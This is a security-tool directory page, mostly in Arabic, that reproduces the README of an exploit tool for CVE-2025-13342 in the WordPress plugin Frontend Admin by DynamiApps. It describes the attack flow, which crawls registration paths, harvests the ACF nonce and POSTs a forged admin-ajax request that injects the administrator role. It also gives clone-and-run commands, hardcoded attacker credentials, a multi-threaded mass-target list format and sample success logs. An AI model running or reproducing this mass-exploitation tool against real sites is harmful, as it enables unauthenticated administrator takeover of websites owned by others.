Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-13342 — Frontend Admin من DynamiApps <= 3.28.20 - تحديث تعسفي للخيارات دون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-13342
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubnxploited/cve-2025-13342

CVE-2025-13342

Frontend Admin من DynamiApps <= 3.28.20 - تحديث تعسفي للخيارات دون مصادقة

عرض المستودع
2منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-13342

Frontend Admin من DynamiApps <= 3.28.20 - تحديث خيارات عشوائي بدون مصادقة

⚡ CVE-2025-13342

Frontend Admin من DynamiApps — إنشاء مشرف بدون مصادقة

   __         __    _  _  _  ___    ,________     _
  / ()(|  |_// ()  / )/ \/ )|__    /| __/ __/|  |/ )
 |     |  |  >- ----/|   |/    \----|   \   \|__|_/
  \___/ \/   \___/ /__\_//__\__/    |\__/\__/   |/__

CVE CVSS Plugin Auth Python


◈ الثغرة

الحقلالتفاصيل
CVE IDCVE-2025-13342
النتيجة9.8 حرجة — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
الإصدارات المتأثرةFrontend Admin من DynamiApps ≤ 3.28.20
المصادقةلا شيء — بدون مصادقة بالكامل
النوعفحص صلاحيات غير كافٍ + التحقق من المدخلات → كتابة خيارات عشوائية
CWECWE-284 · تحكم غير سليم في الوصول

ماذا يحدث:
معالج الحفظ ActionOptions::run() لا يتحقق من صلاحيات المستخدم ولا يتحقق من المدخلات قبل الكتابة إلى wp_options. يصبح نموذج ACF الأمامي العام قناة كتابة مفتوحة. يضبط المهاجم users_can_register=1 و default_role=administrator، ثم يسجّل حسابًا جديدًا يحصل تلقائيًا على دور المشرف.

تتخطى هذه الأداة ذلك الأسلوب ذا الخطوتين — فهي ترسل مباشرة حمولة النموذج المصمّمة مع حقن role=administrator في حقول إنشاء المستخدم عبر acff[user][field_*]، لإنشاء حساب مشرف في استدعاء AJAX واحد.


◈ كيف يعمل الاستغلال

1. Crawl common registration paths  →  locate ACF frontend form
2. Parse hidden fields               →  _acf_nonce, _acf_form
3. Map user fields                   →  username · email · password · role
4. POST /wp-admin/admin-ajax.php
   action=frontend_admin/form_submit
   acff[user][<role_field>] = administrator
5. {"success":true}  →  admin account created
6. Log to acf_success.txt

◈ المتطلبات

requests
beautifulsoup4
colorama
rich
pip install requests beautifulsoup4 colorama rich

◈ التثبيت والتشغيل

git clone https://github.com/Nxploited/CVE-2025-13342.git
cd CVE-2025-13342
pip install -r requirements.txt
python3 CVE-2025-13342.py

◈ الاستخدام

الأداة تفاعلية. سيُطرح عليك أربعة أسئلة:

Targets file path    →  list.txt
Threads              →  10
Timeout (seconds)    →  10
Verbose debug        →  y / N

بيانات الاعتماد محددة داخليًا:

الحقلالقيمة
اسم المستخدمNxadmin1
البريد الإلكتروني[email protected]
كلمة المرورNxAdmin_1337#KSA

◈ ملف الأهداف

مضيف واحد في كل سطر — البروتوكول اختياري:

https://target1.com
target2.com
http://target3.com

◈ مسارات التسجيل المفحوصة

تفحص الأداة 28 مسارًا لكل هدف بالترتيب، وتتوقف عند أول نموذج ACF صالح:

/  /register/  /registration/  /signup/  /sign-up/
/user-registration/  /account/  /my-account/
/frontend-form/  /frontend-register/  ...

◈ المخرجات

الملفالمحتوى
acf_success.txtتأكيد إنشاء حسابات مشرف ناجحة

الصيغة:

[2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/
USER=Nxadmin1 [email protected] PASS=NxAdmin_1337#KSA JSON={"success":true,...}

الطرفية:

[+] Target base:  https://target.com
[+] Found form at: https://target.com/register/
    _acf_nonce:  a1b2c3d4e5
    _acf_form:   123
[+] SUCCESS:  https://target.com

[-] No suitable ACF Frontend form found on ...
[-] FAILED: https://target2.com

◈ التواصل

المؤلفNxploited (Khaled Alenazi)
GitHubgithub.com/Nxploited
Telegram@KNxploited

◈ إخلاء المسؤولية

هذه الأداة مقدمة لأغراض البحث الأمني المصرح به والتعليم فقط.
لا يتحمل المؤلف أي مسؤولية عن أي استخدام ضد أنظمة دون إذن كتابي صريح من المالك.
الوصول غير المصرح به غير قانوني بموجب CFAA وCMA والقوانين المكافئة حول العالم.
أنت وحدك المسؤول عن أفعالك.


© 2025 Nxploited · Frontend Admin by DynamiApps ≤ 3.28.20 · Fixed in 3.28.21
تنزيل الأداة